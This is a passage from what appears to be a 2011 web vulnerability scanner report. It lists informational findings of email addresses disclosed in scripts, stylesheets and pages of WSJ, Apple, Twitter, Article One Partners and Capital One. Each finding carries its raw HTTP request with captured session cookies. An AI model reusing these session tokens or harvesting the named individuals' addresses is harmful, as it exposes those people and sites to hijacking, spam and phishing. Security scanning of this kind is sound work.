bank=dotcom; TestCookie=OK

__EVENTTARGET=ctlEnrollmentWorkflow_Terms_btnContinue&VAM_Group=&__VIEWSTATE=BdAjyMEeqpbGtCbAMwaU6%2BH%2F2RUcEb4OMEvielz8lkZ1gUA4rNV7KFBrFxbYTRbpIyoOb7o8F1zi4yGYRcTodg2oO%2BYtg71OWUJ0wecCSM7kWm409v7Mb
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Date: Fri, 22 Jul 2011 20:42:39 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Header: :=
pics-label: (pics-1.1 http://www.icra.org/pics/vocabularyv03/ l gen true for := r (c 0 l 0 n 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 s0 v 0))
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 78097

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<title id="HTMLTITLE">Capital One Online Banking | Enrollment Step 2 -
...[SNIP]...
<span id="ctlEnrollmentWorkflow_Authentication_litEmailAddressMsg" class="subtext">(yourname@yourisp.com)</span>
...[SNIP]...

22.31. http://sj.wsj.net/djscript/bucket/NA_WSJ/page/0_0_WA_0002/provided/j_global_slim/version/20110719191037.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sj.wsj.net
Path:	/djscript/bucket/NA_WSJ/page/0_0_WA_0002/provided/j_global_slim/version/20110719191037.js

Issue detail

The following email addresses were disclosed in the response:

infotips@yahoo.com
u-suke@kawa.net

Request

GET /djscript/bucket/NA_WSJ/page/0_0_WA_0002/provided/j_global_slim/version/20110719191037.js HTTP/1.1
Host: sj.wsj.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.58 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep09 - Tue 07/19/11 - 19:11:05 EDT
Last-Modified: Tue, 19 Jul 2011 23:11:05 GMT
If-Modified-Since: Tue, 19 Jul 2011 23:11:03 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Type: application/x-javascript
Content-Length: 1042563
Cache-Control: max-age=3352086
Expires: Tue, 30 Aug 2011 23:39:01 GMT
Date: Sat, 23 Jul 2011 04:30:55 GMT
Connection: close

/*
   Copyright (c) 2004-2011, The Dojo Foundation All Rights Reserved.
   Available via Academic Free License >= 2.1 OR the modified BSD license.
   see: http://dojotoolkit.org/license for details
*/

if(
...[SNIP]...
<u-suke@kawa.net>
...[SNIP]...
","anus","biotches","boobs","m0r0n","fuckage","h-o-n-k-y","fuckkk","c.u.n.t.","f-ing","cornholed","fuctard","mcwar","oblahblah","mcshit","http://www.debtchallenges.com","http://blog.tradingideas.in/","infotips@yahoo.com","dirtbags","azzes","goddam","bimbo","chick","doodoohead","www.themastertrader.net","monoprice.com","http://www.dollartalk.net","shlt","dumbasses","phucked","http://www.jewwatch.com/","shiti","www.you
...[SNIP]...

22.32. http://sj.wsj.net/djscript/require/j_global_slim/version/20110721222540.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sj.wsj.net
Path:	/djscript/require/j_global_slim/version/20110721222540.js

Issue detail

The following email address was disclosed in the response:

id@Vs.tc

Request

GET /djscript/require/j_global_slim/version/20110721222540.js HTTP/1.1
Host: sj.wsj.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 22 Jul 2011 02:52:45 GMT
Vary: Accept-Encoding
Server: Apache/2.0.64 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep09 - Thu 07/21/11 - 22:52:45 EDT
If-Modified-Since: Fri, 22 Jul 2011 02:25:44 GMT
Content-Type: application/x-javascript
Content-Length: 226458
Cache-Control: max-age=3538112
Expires: Fri, 02 Sep 2011 03:19:27 GMT
Date: Sat, 23 Jul 2011 04:30:55 GMT
Connection: close

if(typeof dj=="undefined"){dj={};}
if(typeof dj.context=="undefined"){dj.context={};}
if(typeof djConfig=="undefined"){this.djConfig={};}
(function(){var ctx=dj.context,djc=djConfig;ctx.core=(ctx.cor
...[SNIP]...
$4)#7=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t;s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id=^A;s
...[SNIP]...

22.33. http://storeimages.apple.com/1867/store.apple.com/rs/js/store/release/apple.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://storeimages.apple.com
Path:	/1867/store.apple.com/rs/js/store/release/apple.js

Issue detail

The following email address was disclosed in the response:

steve@me.com

Request

GET /1867/store.apple.com/rs/js/store/release/apple.js HTTP/1.1
Host: storeimages.apple.com
Proxy-Connection: keep-alive
Referer: http://store.apple.com/us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D; ccl=YPG5TuFKot1LUn+lq23wrLdlvLPUZJXpPAP21q2AZI6ybOrmCQ9ZvagVaKElnHhuLxZWILPlyU10pXqhEcXHaZA8muizMYxVUyHDxAP/1nqg7Or3wEZaQGRv2xbBSUJmA90kWKiGNAW6Uf7jiyrAIqTtFgtOeWA2YYfTbJKKJt52YHNnKf5HURbWq1GKAWWdJwNuJX/jqQEzK8RJ4TumuXXzJMQryFbRo53bGT4o5YXTEstHYlEdhotv+GFiYid8W80i+u1p++O5ZSdYF3iEuzrN9myAmXbFZrGgn5TxcGU8v9leUS7EKDYqNxvqeypQHhHbO2dc9DqxVa1LGZTPv6wiFB5gKx83rZDijFgpC4S249Tgf+zDP3cBbWAEmvi2KDdVVFonUlUfpWpd1AK3CVm/Oi98XAN+OlMwHC/CdDLWB7VyDpfX5gJd+ZmnJ1I0sLGBXu3Ns7cDz4Rj66ko8ELCLhslcfJMEh45qUnY1+KFoUzgtF1EO6KPe5w2KQbxekoRSFW6zhoc9CCfqgPX9EQI85tjSAyuM2cQWDApn7n21P5svZBUoF4SrBI9fy6L; geo=US

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 20 May 2011 21:17:30 GMT
ETag: "a74f4-35187-4dd6da6a"
Vary: Accept-Encoding
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
x-frame-options: sameorigin
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 217479
Cache-Control: max-age=1465
Expires: Thu, 21 Jul 2011 21:09:07 GMT
Date: Thu, 21 Jul 2011 20:44:42 GMT
Connection: close

/*

Copyright .. 2000-2010 Apple Inc. All Rights Reserved.

*/

var $=function(A){if("string"===typeof A||A instanceof String){return document.getElementById(A)}return A};Package=(function(){v
...[SNIP]...
ailSubscription,apple.widget.BaseWidget);var ServerStatus={good:"SUCCESS",bad:"ERROR",busy:"BUSY",off:"OFF",on:"ON",format:"FORMAT"};apple.widget.EmailSubscription.DEFAULTS={emailPlaceholder:"example: steve@me.com",submitUrl:"email-server-reply.txt",urlArgs:{},argName:"emailAddress",emailFieldSpec:"input.notify_email",submitButtonSpec:".notify_submit",formSpec:"form",fadeDuration:350,showForm:{SUCCESS:false,ERR
...[SNIP]...

22.34. http://widgets.twimg.com/j/2/widget.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://widgets.twimg.com
Path:	/j/2/widget.js

Issue detail

The following email address was disclosed in the response:

dustin@twitter.com

Request

GET /j/2/widget.js HTTP/1.1
Host: widgets.twimg.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response

HTTP/1.0 200 OK
x-amz-id-2: ZkuDk/yfZr5+3RiP/dOR8x+1/sInvNiuo89zrDBsMmP3FxSBfsSBX0L1xZo92idx
x-amz-request-id: CAC1EF4139F59170
Date: Wed, 15 Jun 2011 00:49:37 GMT
Last-Modified: Fri, 08 Apr 2011 20:34:17 GMT
ETag: "8f109f7ba100454bc391fc07377c1aed"
Accept-Ranges: bytes
Content-Type: application/javascript
Content-Length: 31383
Server: AmazonS3
Age: 59873
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 2da5d192ac3e619bfa4af82d20635b420d0649d5ffd244dd677f2d2eabe45fdd906f5b0fa2c61e54
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 f95523505a81f13c442adc823f22544d.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

/**
* Twitter - http://twitter.com
* Copyright (C) 2010 Twitter
* Author: Dustin Diaz (dustin@twitter.com)
*
* V 2.2.5 Twitter search/profile/faves/list widget
* http://twitter.com/widgets
* For full documented source see http://twitter.com/javascripts/widgets/widget.js
* Hosting and modifications of
...[SNIP]...

22.35. http://www.articleonepartners.com/sidebar-modules/get_blog_json.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.articleonepartners.com
Path:	/sidebar-modules/get_blog_json.php

Issue detail

The following email address was disclosed in the response:

tirving@articleonepartners.com

Request

GET /sidebar-modules/get_blog_json.php HTTP/1.1
Host: www.articleonepartners.com
Proxy-Connection: keep-alive
Referer: http://www.articleonepartners.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=evd5u35eelemsittt9277ghcq5; AOPuser=Yes; webpool=webpool_WWW1

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:54:26 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 47095
Connection: close
Content-Type: application/json

[{"authorDisplayName":"Tom Irving","authorEmail":"tirving@articleonepartners.com","blogGuid":"65aa394c-41a3-4396-a811-4e04121e527f","body":"<p><a href=\"http://news.cnet.com/8301-27076_3-20081625-248/
...[SNIP]...
ations":false,"summary":"","tags":["News"],"title":"Help Article One Save the Angry Birds!","url":"http://info.articleonepartners.com/blog/bid/62864/"},{"authorDisplayName":"Tom Irving","authorEmail":"tirving@articleonepartners.com","blogGuid":"65aa394c-41a3-4396-a811-4e04121e527f","body":"<p>
...[SNIP]...
false,"summary":"","tags":["Top 5"],"title":"Top 5: Countries Where U.S. Patents Originate","url":"http://info.articleonepartners.com/blog/bid/62767/"},{"authorDisplayName":"Tom Irving","authorEmail":"tirving@articleonepartners.com","blogGuid":"65aa394c-41a3-4396-a811-4e04121e527f","body":"<p>
...[SNIP]...
onferences","video"],"title":"...Crowdsourcing for Patent Validity... Videos Now Available","url":"http://info.articleonepartners.com/blog/bid/62752/"},{"authorDisplayName":"Tom Irving","authorEmail":"tirving@articleonepartners.com","blogGuid":"65aa394c-41a3-4396-a811-4e04121e527f","body":"<p>
...[SNIP]...
"summary":"","tags":["researcher"],"title":"Article One Featured Researcher: Manjeet Singh","url":"http://info.articleonepartners.com/blog/bid/62631/"},{"authorDisplayName":"Tom Irving","authorEmail":"tirving@articleonepartners.com","blogGuid":"65aa394c-41a3-4396-a811-4e04121e527f","body":"<p>
...[SNIP]...
Notifications":false,"summary":"","tags":["research"],"title":"Featured Resource: Delphion","url":"http://info.articleonepartners.com/blog/bid/62549/"},{"authorDisplayName":"Tom Irving","authorEmail":"tirving@articleonepartners.com","blogGuid":"65aa394c-41a3-4396-a811-4e04121e527f","body":"<p>
...[SNIP]...
n","article one partners"],"title":"Android and iPhone Apps Now Available from Article One","url":"http://info.articleonepartners.com/blog/bid/62397/"},{"authorDisplayName":"Tom Irving","authorEmail":"tirving@articleonepartners.com","blogGuid":"65aa394c-41a3-4396-a811-4e04121e527f","body":"<p>
...[SNIP]...
0,"sendNotifications":false,"summary":"","tags":["Top 5"],"title":"Top 5: Exercise Patents","url":"http://info.articleonepartners.com/blog/bid/62022/"},{"authorDisplayName":"Tom Irving","authorEmail":"tirving@articleonepartners.com","blogGuid":"65aa394c-41a3-4396-a811-4e04121e527f","body":"<p>
...[SNIP]...
","tags":["article one partners","video"],"title":"Article One Videos Available on YouTube","url":"http://info.articleonepartners.com/blog/bid/62005/"},{"authorDisplayName":"Tom Irving","authorEmail":"tirving@articleonepartners.com","blogGuid":"65aa394c-41a3-4396-a811-4e04121e527f","body":"<p>
...[SNIP]...
,"summary":"","tags":["researcher"],"title":"Article One Featured Researcher: Sandy Patent","url":"http://info.articleonepartners.com/blog/bid/61884/"},{"authorDisplayName":"Tom Irving","authorEmail":"tirving@articleonepartners.com","blogGuid":"65aa394c-41a3-4396-a811-4e04121e527f","body":"<p>
...[SNIP]...

22.36. http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boston.com
Path:	/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/

Issue detail

The following email address was disclosed in the response:

bteitell@globe.com

Request

Response

22.37. http://www.capitalone.com/contactus/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/contactus/index.php

Issue detail

The following email address was disclosed in the response:

abuse@capitalone.com

Request

GET /contactus/index.php HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; BIGipServerpl_capitalone.com_443=778642698.65056.0000; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; BIGipServerpl_capitalone.com_80=745088266.29215.0000; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; decipherinc_seen_popup=set; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb; itc=CAPITALONE11NZZZDN1QSWZD4; mbox=check#true#1311366883|session#1311366822807-148063#1311368683|disable#browser%20timeout#1311370442; ssotgt=f2eos; VS_COOKIE=Login; bank=dotcom; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000; smartTracking=

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:43:08 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 29119
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Capital O
...[SNIP]...
<a href="mailto:abuse@capitalone.com?linkid=WWW_Z_Z_A1098B142CS405_CU1_R3_01_T_Z" target="_blank">abuse@capitalone.com</a>
...[SNIP]...

22.38. http://www.capitalone.com/css/footer.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/footer.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/footer.css HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/?linkid=WWW_Z_NDB_A6A58_SP30_C1_01_T_SP1SP1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; BIGipServerpl_capitalone.com_443=778642698.65056.0000; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; BIGipServerpl_capitalone.com_80=745088266.29215.0000; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; smartTracking=; decipherinc_seen_popup=set; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:31:51 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 14:09:08 GMT
Accept-Ranges: bytes
Expires: Sat, 23 Jul 2011 20:31:51 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 1720
Content-Type: text/css

/*-----------------------------------------------------------------------------
www.capitalone.com Footer Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Global Footer
-------------------------------------------------------------------------------------------------
...[SNIP]...

22.39. http://www.capitalone.com/css/framework/base.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/framework/base.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/framework/base.css HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/?linkid=WWW_Z_NDB_A6A58_SP30_C1_01_T_SP1SP1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; BIGipServerpl_capitalone.com_443=778642698.65056.0000; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; BIGipServerpl_capitalone.com_80=745088266.29215.0000; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; smartTracking=; decipherinc_seen_popup=set; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:31:50 GMT
Server: Apache
Last-Modified: Wed, 03 Nov 2010 13:58:09 GMT
Accept-Ranges: bytes
Expires: Sat, 23 Jul 2011 20:31:50 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 4924
Content-Type: text/css

/*-----------------------------------------------------------------------------
www.capitalone.com Base Style Sheet
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Reset
----------------------------------------------------------------------------------------------------*/
b
...[SNIP]...

22.40. http://www.capitalone.com/css/framework/grid.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/framework/grid.css

Issue detail

The following email address was disclosed in the response:

daniel.cottner@capitalone.com

Request

GET /css/framework/grid.css HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/?linkid=WWW_Z_NDB_A6A58_SP30_C1_01_T_SP1SP1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; BIGipServerpl_capitalone.com_443=778642698.65056.0000; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; BIGipServerpl_capitalone.com_80=745088266.29215.0000; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; smartTracking=; decipherinc_seen_popup=set; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:31:50 GMT
Server: Apache
Last-Modified: Fri, 06 Aug 2010 16:24:05 GMT
Accept-Ranges: bytes
Expires: Sat, 23 Jul 2011 20:31:50 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 9434
Content-Type: text/css

/*-----------------------------------------------------------------------------
www.capitalone.com Grid Style Sheet - Based on 960.gs
version: 1.0
author: Daniel Cottner
e-mail: daniel.cottner@capitalone.com
-----------------------------------------------------------------------------*/

/* =Grid Containers - 960 Grid System
-----------------------------------------------------------------------------
...[SNIP]...

22.41. http://www.capitalone.com/css/framework/print.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/css/framework/print.css

Issue detail

The following email address was disclosed in the response:

james.steincamp@capitalone.com

Request

GET /css/framework/print.css HTTP/1.1
Host: www.capitalone.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/?linkid=WWW_Z_NDB_A6A58_SP30_C1_01_T_SP1SP1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
